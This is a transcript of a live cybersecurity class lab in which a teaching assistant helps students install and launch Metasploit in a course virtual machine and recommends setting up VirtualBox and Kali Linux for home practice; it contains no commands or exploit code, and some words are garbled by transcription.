Page 6. So you were trying to run and launch or install Metasploit, right? Because that's basically what it's trying to do. It's running Metasploit from a GitHub repo.
Yeah, so I was trying to run the raw get Herbert's content for Metasploit,
Yeah.
and I got all the way through the command prompt all the way to like ms fu update
Okay.
ERB and a little
Yeah.
greater than less than sign, and I messed that
Okay.
up.
So if anything too, what I would recommend is, you see how it has like this little icon right here in that box that says copy to clipboard? Just do that one. The command is really long, and usually if we're typing it out, there could be some discrepancies. You could be missing either a specific line, code, letter, symbol, whatever. So just click on that one, and then as soon as you paste it in, it should automatically have it there, and you just hit enter. You should be fine.
Slow moment. Sorry about that.
Hey, no, you're good. It's okay. Believe me, I'm used to typing stuff out. I mean, all my PowerShell scripts, I had to type them out manually. And this is building them in like a notepad. So I'm using the Microsoft documentation, using my notepad, and then having the PowerShell ISE programmed in order to run stuff. Takes practice, takes time, and then afterwards, when you see something like this that's simple, copy pasta works. And Manny, no need to be sad. And here, I'll roll for appreciation. Let's see, what do you get? Ooh, buddy, I'm sorry, you got a 7. Sorry, bud.
Do we need to go in this virtual machine and put everything back how it was, or no?
Don't even worry about it. If you want, click on reset VM. It resets everything. So 74565, boom. It'll reset the VM. Don't even worry about it. But yeah, we're pretty much done. That's
Okay.
pretty much how it is. That's usually how it works for, attackers, how they exploit and run things on, machines themselves. It doesn't have to be virtual machines. It can be any type of machine. It can be a Dell, a Lenovo. It can even be a Microsoft Surface. It just depends on how they get that access. So it looks like there's one more question here. It looks like it's just asking, did you run into any unexpected challenges with this lab? Again, feel free to express yourselves. Be blunt, but don't be too harsh on me. Now, another thing too, you guys can do too, if you guys are, advantageous, you want to test this out on your own, kind of testings in a sense of a virtual machine for your own on your local system, I would recommend downloading VirtualBox. Excuse me, VirtualBox, downloading a Windows virtual machine, installer, or if you have like the disk itself, there's plenty of ways to downloading it and installing it, and then running a Kali Linux or even just a Linux instance, and then testing it out yourself. See, for me, I have yes, VM question. For me, I have VirtualBox set up, and then I have one that comes from the Cisco lab website. They kind of have this kind of stuff to where you can test things out, run stuff, tools that are already installed, and etc. And then you could just mess with it as best as you can. But I've had virtual machines with Kali Purple, Kali Linux, the regular one, and then just Ubuntu and running the installation for tools by itself. So you can do it that way as well. It just depends on how comfortable you feel and how openly available you have of time in order to download those tools. So like I said, with Ubuntu or any other version of Linux that isn't Kali that has the tools already installed, downloading them is a good way to figure out how that's going to go and how you can get your tools to work for you instead of the tools working against you. I hope that kind of makes sense because I've had to do this on separate times and separate occasions. But
yeah, we can put that VirtualBox on our computer, right?
Yeah, VirtualBox is free. You can install it, and then you can run different virtual machines. And since you said you have a gaming PC, obviously you have the processing power for it and plenty of RAM, and it doesn't affect anything on your system. Completely separate.
I'm gonna be doing that now.
So, Manny, to answer your question about, creating the virtual machine, all the configurations and updates, I mean, Yes. Are we talking about the virtual machine that you create for yourself? Or are you talking about the one within Codio? I just want to make sure before I give you an answer. Okay. So personal one, you don't have to. Usually you can create the snapshots if you want to test different vulnerabilities, different exploits, and etc., and then go from there. But if you basically have a virtual machine that you just want to break it as best as you can, as far as you can, do it, and then you can roll it back to whatever setting that you had it before. You can even roll it back to the very first installation. But I like doing all my exploits and then nuking it and reinstalling all over again. Yeah, it's a hassle, but
I got something different this time when I ran was it Metasploit? It's been just short.
yeah, David, you guys are good to go. The lab's pretty much done. Yeah, I mean, we worked through this really quickly, so you guys did really great. I'll make sure to save this and edit everything that we may not need. Thank you, David. I appreciate that. Again, still trying to get used to the whole TA stuff, but I appreciate it.
This what I got this time.
Okay, cool. So you literally just have Metasploit running.
I did it.
Yeah, you're running Metasploit, man.
Oh man, yes.
See, it even says it right there. Session 1 died of dysentery. Appreciate it, Filippo. And thank you as well, David. Appreciate it. You're welcome, Scott. You guys have a good rest of your day. For those who want to stick around, I can hang out for a little while longer. I'll stop the recording so that way we can just stop it there. But if you guys want to hang around, you want to go over this again, we can. I can create a huddle or just, whatever. Oh, looks like either way, the breakout rooms are breaking out. But have a
Yeah,
good weekend, everyone.
Well,
I'm
how soon?
game. Okay.
I have a question. Where will you be sending the recording of this video?